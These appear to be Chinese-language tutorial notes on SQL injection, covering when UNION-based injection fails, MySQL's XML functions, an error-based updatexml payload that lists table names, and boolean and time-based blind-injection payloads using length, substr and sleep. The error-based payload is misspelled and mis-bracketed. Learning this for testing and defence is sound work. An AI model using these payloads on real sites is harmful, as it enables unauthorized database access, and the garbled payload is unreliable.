4.SQL注入-错误注入与盲注

一.Union查询注入不使用的地方

1.注入语句无法截断，且不清楚完整的SQL查询语句；

2.页面不能返回查询信息的时候；

3.Web页面中有两个SQL查询语句，查询语句的列数不同；

 

二.关于MySQL处理XML

1.先准备以下XML内容

<class id="WNCDC085">

　　<student sequence="1">

　　　　<id>WNCD201703015</id>

　　　　<name>羽</name>

　　　　<sex>男</sex>

　　　　<age>24</age>

　　　　<degree>本科</degree>

　　　　<school>XX大学</school>

　　</student>

</class>

select extractvalue(testxml,'//student[@sequence="1"]/name') from xmltable;

update xmltable set testxml = updatexml(testxml,'//student[@sequence="1"]/name',"<name>雨</name>");

?id=1 and updataxml(1,concat(0x7e,(select group_concat(table_name) 
from information_schma.tables,0x7e),1)

 

三.盲注

没有回显的时候

1.Boolean型注入

?id=1 and  length(database())=5

?id=1 and (select substr(database(),1,1)='l')

2.时间型注入

?id=1 and if(length(database())=5,sleep(2),1);

?id=1 and if((select substr(database(),1,1)='l'),sleep(2),1);